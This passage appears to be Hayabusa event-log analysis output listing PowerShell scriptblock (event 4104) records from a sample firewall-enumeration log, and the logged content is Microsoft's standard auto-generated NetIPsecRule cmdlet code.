(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHas",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 